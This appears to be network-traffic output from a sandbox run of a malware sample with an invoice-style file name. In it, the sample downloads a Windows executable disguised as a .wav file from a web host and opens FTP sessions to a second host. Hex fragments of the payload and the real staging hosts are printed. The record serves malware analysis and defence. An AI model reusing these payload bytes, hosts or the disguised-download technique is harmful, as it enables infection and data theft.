                                                            Sep 27, 2024 16:01:28.502341986 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.502433062 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.502636909 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.502707958 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.502927065 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.502994061 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.503477097 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.503562927 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.503922939 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.503990889 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.504334927 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.504409075 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.504942894 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.505003929 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.505033970 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.505089998 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.505611897 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.505677938 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.505949020 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.506010056 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.506515980 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.506578922 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.506872892 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.506939888 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.507272959 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.507329941 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.507664919 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.507738113 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.507988930 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.508049965 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.553994894 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.554075003 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.591217995 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.591314077 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.592056036 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.592093945 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.592132092 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.592144012 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.592155933 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.592185974 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.592351913 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.592402935 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.593069077 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.593127966 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.593290091 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.593336105 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.593626022 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.593662977 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.593667030 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.593676090 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.593707085 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.593730927 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.594552040 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.594623089 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.595143080 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.595201015 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.595510006 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.595566034 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.595712900 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.595773935 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.596478939 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.596550941 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.596569061 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.596616030 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.597054958 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.597116947 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.597785950 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.597851038 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.617244959 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.617410898 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.650285959 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.650381088 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.690793991 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.690962076 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.691003084 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.691070080 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.691206932 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.691267014 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.691968918 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.692053080 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.692071915 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.692137003 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.692591906 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.692653894 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.692678928 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.692738056 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.693051100 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.693113089 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.693125963 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.693156004 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.693185091 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.693212032 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.693883896 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.693937063 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.693978071 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.694041967 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.694808960 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.694889069 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.694933891 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.694993019 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.695025921 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.695086956 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.695684910 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.695749044 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.721223116 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.721321106 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.738240004 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.738323927 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.778090000 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.778274059 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.778342009 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.778357983 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.778386116 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.778393030 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.778403044 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.778433084 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.778455973 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.778486013 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.778666019 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.778719902 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.779047966 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.779088020 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.779097080 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.779103994 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.779129982 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.779146910 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.779716015 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.779773951 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.780124903 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.780173063 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.780179024 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.780184984 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.780221939 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.780232906 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.780241013 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.780246973 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.780272007 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.780297995 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.780333996 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.780514002 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.781222105 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.781271935 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.781275988 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.781282902 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.781303883 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.781315088 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.781323910 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.781337976 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.781357050 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.782202959 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.782236099 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.782253027 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.782259941 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.782284021 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.782305002 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.825314045 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.825548887 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.825584888 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.825690031 CEST4434972467.212.175.162192.168.2.6
                                                            Sep 27, 2024 16:01:28.829021931 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:28.993733883 CEST49724443192.168.2.667.212.175.162
                                                            Sep 27, 2024 16:01:31.324928999 CEST4972521192.168.2.65.2.84.236
                                                            Sep 27, 2024 16:01:31.330420017 CEST21497255.2.84.236192.168.2.6
                                                            Sep 27, 2024 16:01:31.330724955 CEST4972521192.168.2.65.2.84.236
                                                            Sep 27, 2024 16:01:31.971101999 CEST21497255.2.84.236192.168.2.6
                                                            Sep 27, 2024 16:01:31.972700119 CEST4972521192.168.2.65.2.84.236
                                                            Sep 27, 2024 16:01:31.984746933 CEST21497255.2.84.236192.168.2.6
                                                            Sep 27, 2024 16:01:32.200687885 CEST21497255.2.84.236192.168.2.6
                                                            Sep 27, 2024 16:01:32.200988054 CEST4972521192.168.2.65.2.84.236
                                                            Sep 27, 2024 16:01:32.205929041 CEST21497255.2.84.236192.168.2.6
                                                            Sep 27, 2024 16:01:32.451427937 CEST21497255.2.84.236192.168.2.6
                                                            Sep 27, 2024 16:01:32.451587915 CEST4972521192.168.2.65.2.84.236
                                                            Sep 27, 2024 16:01:32.456528902 CEST21497255.2.84.236192.168.2.6
                                                            Sep 27, 2024 16:01:32.775887966 CEST21497255.2.84.236192.168.2.6
                                                            Sep 27, 2024 16:01:32.776045084 CEST4972521192.168.2.65.2.84.236
                                                            Sep 27, 2024 16:01:32.781167984 CEST21497255.2.84.236192.168.2.6
                                                            Sep 27, 2024 16:01:32.996535063 CEST21497255.2.84.236192.168.2.6
                                                            Sep 27, 2024 16:01:32.996685028 CEST4972521192.168.2.65.2.84.236
                                                            Sep 27, 2024 16:01:33.001641989 CEST21497255.2.84.236192.168.2.6
                                                            Sep 27, 2024 16:01:33.217451096 CEST21497255.2.84.236192.168.2.6
                                                            Sep 27, 2024 16:01:33.217598915 CEST4972521192.168.2.65.2.84.236
                                                            Sep 27, 2024 16:01:33.223221064 CEST21497255.2.84.236192.168.2.6
                                                            Sep 27, 2024 16:01:33.243275881 CEST4971921192.168.2.65.2.84.236
                                                            Sep 27, 2024 16:01:33.439220905 CEST21497255.2.84.236192.168.2.6
                                                            Sep 27, 2024 16:01:33.439924955 CEST4972649791192.168.2.65.2.84.236
                                                            Sep 27, 2024 16:01:33.445151091 CEST49791497265.2.84.236192.168.2.6
                                                            Sep 27, 2024 16:01:33.445225954 CEST4972649791192.168.2.65.2.84.236
                                                            Sep 27, 2024 16:01:33.445293903 CEST4972521192.168.2.65.2.84.236
                                                            Sep 27, 2024 16:01:33.450195074 CEST21497255.2.84.236192.168.2.6
                                                            Sep 27, 2024 16:01:34.057406902 CEST21497255.2.84.236192.168.2.6
                                                            Sep 27, 2024 16:01:34.057672024 CEST4972649791192.168.2.65.2.84.236
                                                            Sep 27, 2024 16:01:34.057825089 CEST4972649791192.168.2.65.2.84.236
                                                            Sep 27, 2024 16:01:34.062582016 CEST49791497265.2.84.236192.168.2.6
                                                            Sep 27, 2024 16:01:34.063471079 CEST49791497265.2.84.236192.168.2.6
                                                            Sep 27, 2024 16:01:34.063545942 CEST4972649791192.168.2.65.2.84.236
                                                            Sep 27, 2024 16:01:34.165246964 CEST4972521192.168.2.65.2.84.236
                                                            Sep 27, 2024 16:01:34.279230118 CEST21497255.2.84.236192.168.2.6
                                                            Sep 27, 2024 16:01:34.462114096 CEST4972521192.168.2.65.2.84.236
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Sep 27, 2024 16:01:03.463947058 CEST6344053192.168.2.61.1.1.1
                                                            Sep 27, 2024 16:01:03.725960970 CEST53634401.1.1.1192.168.2.6
                                                            Sep 27, 2024 16:01:07.854881048 CEST5484653192.168.2.61.1.1.1
                                                            Sep 27, 2024 16:01:07.949069977 CEST53548461.1.1.1192.168.2.6
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Sep 27, 2024 16:01:03.463947058 CEST192.168.2.61.1.1.10xcaf8Standard query (0)wymascensores.comA (IP address)IN (0x0001)false
                                                            Sep 27, 2024 16:01:07.854881048 CEST192.168.2.61.1.1.10x2118Standard query (0)ftp.alternatifplastik.comA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Sep 27, 2024 16:01:03.725960970 CEST1.1.1.1192.168.2.60xcaf8No error (0)wymascensores.com67.212.175.162A (IP address)IN (0x0001)false
                                                            Sep 27, 2024 16:01:07.949069977 CEST1.1.1.1192.168.2.60x2118No error (0)ftp.alternatifplastik.com5.2.84.236A (IP address)IN (0x0001)false
                                                            • wymascensores.com
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.64971067.212.175.1624432896C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-27 14:01:04 UTC82OUTGET /john/Teoecc.wav HTTP/1.1
                                                            Host: wymascensores.com
                                                            Connection: Keep-Alive
                                                            2024-09-27 14:01:04 UTC211INHTTP/1.1 200 OK
                                                            Date: Fri, 27 Sep 2024 14:01:03 GMT
                                                            Server: Apache
                                                            Last-Modified: Fri, 27 Sep 2024 00:13:08 GMT
                                                            Accept-Ranges: bytes
                                                            Content-Length: 1912832
                                                            Connection: close
                                                            Content-Type: audio/x-wav
                                                            2024-09-27 14:01:04 UTC7981INData Raw: 34 44 35 41 39 30 30 30 30 33 30 30 30 30 30 30 30 34 30 30 30 30 30 30 46 46 46 46 30 30 30 30 42 38 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 38 30 30 30 30 30 30 30 30 45 31 46 42 41 30 45 30 30 42 34 30 39 43 44 32 31 42 38 30 31 34 43 43 44 32 31 35 34 36 38 36 39 37 33 32 30 37 30 37 32 36 46 36 37 37 32 36 31 36 44 32 30 36 33 36 31 36 45 36 45 36 46 37 34 32 30 36 32 36 35 32 30 37 32 37 35 36 45 32 30 36 39 36 45 32 30 34 34 34 46 35 33 32 30 36 44 36 46 36 34 36 35 32 45 30 44 30 44 30 41 32 34 30 30 30 30 30 30 30 30 30 30 30 30 30
                                                            Data Ascii: 4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A240000000000000
                                                            2024-09-27 14:01:04 UTC8000INData Raw: 45 35 44 30 32 30 30 30 34 37 42 39 38 30 32 30 30 30 34 36 31 37 45 43 38 30 32 30 30 30 34 32 38 34 33 30 39 30 30 30 36 32 30 39 43 34 37 37 36 45 38 32 30 39 34 44 37 32 37 39 46 36 31 37 45 35 44 30 32 30 30 30 34 37 42 38 37 30 32 30 30 30 34 36 31 37 45 43 38 30 32 30 30 30 34 32 38 34 33 30 39 30 30 30 36 32 38 31 32 30 30 30 30 32 42 38 30 34 37 30 30 30 30 30 34 32 30 31 45 30 30 30 30 30 30 33 38 44 30 46 38 46 46 46 46 32 30 45 33 35 32 42 39 41 32 32 30 45 36 36 36 32 44 41 38 36 31 37 45 35 44 30 32 30 30 30 34 37 42 36 45 30 32 30 30 30 34 36 31 37 45 43 38 30 32 30 30 30 34 32 38 34 33 30 39 30 30 30 36 32 30 34 32 38 45 31 31 35 42 32 30 33 33 42 43 32 41 37 46 36 31 37 45 35 44 30 32 30 30 30 34 37 42 35 45 30 32 30 30 30 34 36 31 37 45
                                                            Data Ascii: E5D0200047B98020004617EC80200042843090006209C4776E82094D7279F617E5D0200047B87020004617EC80200042843090006281200002B8047000004201E00000038D0F8FFFF20E352B9A220E6662DA8617E5D0200047B6E020004617EC8020004284309000620428E115B2033BC2A7F617E5D0200047B5E020004617E
                                                            2024-09-27 14:01:04 UTC8000INData Raw: 30 30 30 30 30 30 30 30 30 32 41 31 33 33 30 30 33 30 30 38 30 30 30 30 30 30 30 30 31 30 30 30 30 31 31 32 38 38 33 30 33 30 30 30 36 32 30 30 31 30 30 30 30 30 30 46 45 30 45 30 30 30 30 33 38 30 30 30 30 30 30 30 30 46 45 30 43 30 30 30 30 34 35 30 33 30 30 30 30 30 30 32 45 30 30 30 30 30 30 30 35 30 30 30 30 30 30 35 37 30 30 30 30 30 30 33 38 32 39 30 30 30 30 30 30 37 45 41 33 30 32 30 30 30 34 32 38 41 46 30 38 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 35 44 30 32 30 30 30 34 37 42 39 30 30 32 30 30 30 34 33 39 43 43 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 43 31 46 46 46 46 46 46 37 45 41 34 30 32 30 30 30 34 32 38 42 33 30 38 30 30 30 36 32 30 30 32 30 30 30 30 30 30 37 45 35 44 30 32 30 30 30 34 37 42 36 37 30 32 30 30
                                                            Data Ascii: 0000000002A13300300800000000100001128830300062001000000FE0E00003800000000FE0C000045030000002E000000050000005700000038290000007EA302000428AF08000620000000007E5D0200047B9002000439CCFFFFFF26200000000038C1FFFFFF7EA402000428B308000620020000007E5D0200047B670200
                                                            2024-09-27 14:01:04 UTC8000INData Raw: 33 30 30 38 30 30 30 30 30 30 30 30 31 30 30 30 30 31 31 32 38 38 33 30 33 30 30 30 36 32 30 30 31 30 30 30 30 30 30 46 45 30 45 30 30 30 30 33 38 30 30 30 30 30 30 30 30 46 45 30 43 30 30 30 30 34 35 30 33 30 30 30 30 30 30 32 46 30 30 30 30 30 30 30 36 30 30 30 30 30 30 30 35 30 30 30 30 30 30 33 38 32 41 30 30 30 30 30 30 32 41 37 45 41 33 30 32 30 30 30 34 32 38 41 46 30 38 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 35 44 30 32 30 30 30 34 37 42 39 36 30 32 30 30 30 34 33 41 43 42 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 43 30 46 46 46 46 46 46 37 45 41 34 30 32 30 30 30 34 32 38 42 33 30 38 30 30 30 36 32 30 30 32 30 30 30 30 30 30 37 45 35 44 30 32 30 30 30 34 37 42 33 44 30 32 30 30 30 34 33 39 41 32 46 46 46 46 46 46 32 36
                                                            Data Ascii: 300800000000100001128830300062001000000FE0E00003800000000FE0C000045030000002F0000000600000005000000382A0000002A7EA302000428AF08000620000000007E5D0200047B960200043ACBFFFFFF26200000000038C0FFFFFF7EA402000428B308000620020000007E5D0200047B3D02000439A2FFFFFF26
                                                            2024-09-27 14:01:04 UTC8000INData Raw: 34 32 38 42 33 30 38 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 35 44 30 32 30 30 30 34 37 42 33 44 30 32 30 30 30 34 33 41 43 42 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 43 30 46 46 46 46 46 46 37 45 41 33 30 32 30 30 30 34 32 38 41 46 30 38 30 30 30 36 32 30 30 31 30 30 30 30 30 30 37 45 35 44 30 32 30 30 30 34 37 42 39 39 30 32 30 30 30 34 33 39 41 32 46 46 46 46 46 46 32 36 32 30 30 31 30 30 30 30 30 30 33 38 39 37 46 46 46 46 46 46 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 37 32 41 30 30 30 30 30 30 31 32 30 30
                                                            Data Ascii: 428B308000620000000007E5D0200047B3D0200043ACBFFFFFF26200000000038C0FFFFFF7EA302000428AF08000620010000007E5D0200047B9902000439A2FFFFFF2620010000003897FFFFFF120000142A000000120000002A000000120000002A000000120000142A000000120000002A000000120000172A0000001200
                                                            2024-09-27 14:01:04 UTC8000INData Raw: 34 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 31 33 33 30 30 35 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 30 33 33 30 30 38 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 34 31 33 34 30 30 30 30 30 32 30 30 30 30 30 30 31 32 30 31 30 30 30 30 39 32 30 30 30 30 30 30 41 34 30 31 30 30 30 30 38 42 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 44 36 30 30 30 30 30 30 35 39 30 31 30 30 30 30 32 46 30 32 30 30 30 30 38 42 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 33 33 30 30 34 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 31 33 33 30 30 35 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
                                                            Data Ascii: 40004000000000000000000142A1330050004000000000000000000002A0330080004000000000000000000142A41340000020000001201000092000000A40100008B0000000000000002000000D6000000590100002F0200008B000000000000001330040004000000000000000000142A1330050004000000000000000000
                                                            2024-09-27 14:01:04 UTC8000INData Raw: 46 31 46 30 41 31 46 33 41 30 36 32 38 36 45 30 33 30 30 30 36 31 32 30 35 31 31 30 36 30 39 31 31 30 34 31 43 31 46 30 46 31 46 33 42 30 36 32 38 36 45 30 33 30 30 30 36 31 32 30 34 31 31 30 35 31 31 30 36 30 39 31 46 30 44 31 46 31 35 31 46 33 43 30 36 32 38 36 45 30 33 30 30 30 36 31 32 30 33 31 31 30 34 31 31 30 35 31 31 30 36 31 41 31 43 31 46 33 44 30 36 32 38 36 45 30 33 30 30 30 36 31 32 30 36 30 39 31 31 30 34 31 31 30 35 31 46 30 42 31 46 30 41 31 46 33 45 30 36 32 38 36 45 30 33 30 30 30 36 31 32 30 35 31 31 30 36 30 39 31 31 30 34 31 38 31 46 30 46 31 46 33 46 30 36 32 38 36 45 30 33 30 30 30 36 31 32 30 34 31 31 30 35 31 31 30 36 30 39 31 46 30 39 31 46 31 35 31 46 34 30 30 36 32 38 36 45 30 33 30 30 30 36 30 39 31 31 30 46 35 38 30 44 31 31
                                                            Data Ascii: F1F0A1F3A06286E030006120511060911041C1F0F1F3B06286E030006120411051106091F0D1F151F3C06286E03000612031104110511061A1C1F3D06286E030006120609110411051F0B1F0A1F3E06286E03000612051106091104181F0F1F3F06286E030006120411051106091F091F151F4006286E03000609110F580D11
